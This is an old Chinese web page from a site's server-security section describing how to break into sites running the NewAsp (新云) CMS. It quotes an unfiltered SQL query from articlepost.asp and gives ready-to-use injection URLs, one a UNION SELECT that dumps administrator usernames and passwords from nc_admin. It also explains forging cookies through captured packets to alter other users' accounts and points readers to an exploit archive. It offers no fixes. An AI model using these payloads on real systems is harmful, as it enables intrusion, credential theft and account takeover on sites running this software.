|
| 您的位置: >> 相关知识 >> 服务器搭建 >> 服务器安全 >> |
 |
|
 |
合金网络科技 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| 添加日期:2007-11-26 点击次数:19次 |
|
 |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
关于新云
漏洞原理 利用各种方法实现入侵,如COOKIES、抓包、注入检测等。 1.过滤未全 user\articlepost.asp 文件第333行 Quote SQL = 'select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom, WriteTime,username from NC_Article where ChannelID=' & ChannelID & ' And username=’' & Newasp.MemberName & '’ And ArticleID=' & Request('ArticleID') 没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句: articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select% 201,2,3,4,5,username,password,8,9%20from%20nc_admin 注册后直接在浏览器上输入,就可以爆出管理员的表和代码。 2.新云2.1SQL版注入漏洞 漏洞描述: 动画频道的“动画管理”和“审核管理”,错误类型: Quote
可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如: articlepost.asp?ChannelID=1&action=view&ArticleID=1;-- 3.COOKIES欺骗获取管理账号 攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。 4.coon.asp的下载 新云下载程序最新通杀漏洞 -通杀所有版本.rar 呵呵 大家可以去百度搜索下很多的哦。。。 |
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
 |
| "凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..." |
